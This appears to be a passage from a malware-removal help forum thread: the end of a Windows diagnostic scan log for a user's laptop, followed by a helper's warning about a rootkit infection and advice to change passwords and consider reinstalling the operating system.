Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe

 

==================== Loaded Modules (whitelisted) =============

 

2012-01-04 07:03 - 2009-11-04 13:14 - 00157696 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\lxecdrpp.dll

2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2011-04-30 00:41 - 2011-03-02 13:40 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll

2013-02-12 21:37 - 2013-02-12 21:37 - 01263952 _____ () C:\Program Files\DivX\DivX Update\DivXUpdate.exe

2013-02-12 21:38 - 2013-02-12 21:38 - 00100688 _____ () C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll

2009-03-15 21:15 - 2008-12-22 05:32 - 00054784 _____ () C:\Windows\System32\bcmwlrmt.dll

2009-07-17 21:46 - 2011-08-17 23:16 - 03077528 _____ () C:\Program Files\Pando Networks\Media Booster\PMB.exe

2014-10-17 02:42 - 2014-10-17 02:42 - 00284160 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\df2a920b8e863d14ab8503f96c7b3ecd\VistaBridgeLibrary.ni.dll

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3

 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

MSCONFIG\Services: AESTFilters => 2

MSCONFIG\Services: Apple Mobile Device => 2

MSCONFIG\Services: asurscsi => 2

MSCONFIG\Services: Bonjour Service => 2

MSCONFIG\Services: DockLoginService => 2

MSCONFIG\Services: GameConsoleService => 3

MSCONFIG\Services: GoToAssist => 3

MSCONFIG\Services: gupdate => 2

MSCONFIG\Services: gupdatem => 3

MSCONFIG\Services: gusvc => 3

MSCONFIG\Services: hnmsvc => 2

MSCONFIG\Services: IAANTMON => 2

MSCONFIG\Services: iPod Service => 3

MSCONFIG\Services: lxec_device => 2

MSCONFIG\Services: SkypeUpdate => 2

MSCONFIG\Services: sprtsvc_DellSupportCenter => 2

MSCONFIG\Services: Steam Client Service => 3

MSCONFIG\Services: stllssvr => 3

MSCONFIG\Services: UMVPFSrv => 2

 

========================= Accounts: ==========================

 

Administrator (S-1-5-21-879967681-4271235005-1519339517-500 - Administrator - Disabled)

Guest (S-1-5-21-879967681-4271235005-1519339517-501 - Limited - Disabled)

Tyler (S-1-5-21-879967681-4271235005-1519339517-1000 - Administrator - Enabled) => C:\Users\Tyler

 

==================== Faulty Device Manager Devices =============

 

Name: Teredo Tunneling Pseudo-Interface

Description: Microsoft Tun Miniport Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Microsoft

Service: tunmp

Problem: : This device cannot start. (Code10)

Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.

On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (11/13/2014 06:45:33 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/09/2014 03:42:39 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/09/2014 07:16:35 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/09/2014 04:00:11 AM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application iexplore.exe, version 9.0.8112.16584, time stamp 0x4549b14e, faulting module MSHTML.dll, version 9.0.8112.16584, time stamp 0x541cb3c5, exception code 0xc0000005, fault offset 0x00260cee,

process id 0x2f00, application start time 0xiexplore.exe0.

 

Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

 

System errors:

=============

Error: (11/13/2014 06:48:34 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/13/2014 06:48:26 PM) (Source: Service Control Manager) (EventID: 7022) (User: )

Description: McAfee Home Network

 

Error: (11/13/2014 06:47:21 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

 

Error: (11/13/2014 06:46:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: Intel® PRO/1000 NDIS 6 Adapter Driver%%1058

 

Error: (11/13/2014 06:46:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: Intel® PRO/1000 PCI Express Network Connection Driver%%1058

 

Error: (11/09/2014 03:46:42 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/09/2014 03:46:32 PM) (Source: Service Control Manager) (EventID: 7022) (User: )

Description: McAfee Home Network

 

Error: (11/09/2014 03:45:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

 

Error: (11/09/2014 03:43:47 PM) (Source: Service Control Manager) (EventID: 7011) (User: )

Description: 30000WSearch

 

Error: (11/09/2014 03:43:47 PM) (Source: Service Control Manager) (EventID: 7011) (User: )

Description: 30000WerSvc

 

 

Microsoft Office Sessions:

=========================

 

CodeIntegrity Errors:

===================================

  Date: 2014-11-13 19:00:51.252

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 19:00:50.347

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 19:00:49.474

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 19:00:48.538

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-13 18:46:02.171

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 15:43:40.602

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 07:16:24.156

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 07:16:23.235

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 06:04:55.240

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-11-09 06:04:51.421

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

 

==================== Memory info =========================== 

 

Processor: Pentium® Dual-Core CPU T4200 @ 2.00GHz

Percentage of memory in use: 53%

Total physical RAM: 3033.63 MB

Available physical RAM: 1413.15 MB

Total Pagefile: 6269.51 MB

Available Pagefile: 4625.14 MB

Total Virtual: 2047.88 MB

Available Virtual: 1892.57 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:218.2 GB) (Free:35.52 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive e: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:8.72 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 232.9 GB) (Disk ID: 2F03C1E0)

Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)

Partition 2: (Not Active) - (Size=14.6 GB) - (Type=07 NTFS)

Partition 3: (Active) - (Size=218.2 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================


One or more of the identified infections is related to a nasty rootkit component which is difficult to remove. Rootkits and backdoor Trojans are very dangerous because they use advanced techniques (backdoors) as a means of accessing a computer system that bypasses security mechanisms and steal sensitive information which they send back to the hacker. Many rootkits can hook into the Windows 32-bit kernel, and patch several APIs to hide new registry keys and files they install. Remote attackers use backdoor Trojans and rootkits as part of an exploit to gain unauthorized access to a computer and take control of it without your knowledge.

If your computer was used for online banking, has credit card information or other sensitive data on it, you should immediately disconnect from the Internet until your system is cleaned. All passwords should be changed immediately to include those used for banking, email, eBay, PayPal and online forums from a CLEAN COMPUTER. You should consider them to be compromised. You should change each password by using a different computer and not the infected one. If not, an attacker may get the new passwords and transaction information. If using a router, you need to reset it with a strong logon/password so the malware cannot gain control before connecting again. Banking and credit card institutions should be notified of the possible security breach. Because your computer was compromised please read How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?

Although the rootkit has been identified and may be removed, your PC has likely been compromised and there is no way to be sure the computer can ever be trusted again. It is dangerous and incorrect to assume that because this malware has been removed the computer is now secure. In some instances an infection may have caused so much damage to your system that it cannot be completely cleaned or repaired. The malware may leave so many remnants behind that security tools cannot find them. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, delete the partition, reformat and reinstall the Operating System.

Please read:

Should you decide not to follow this advice, we will do our best to help clean the computer of any infections but we cannot guarantee it to be trustworthy or that the removal will be successful. If you wish to proceed, disinfection will require more time and more advanced tools.

Please let us know how you would like to proceed.
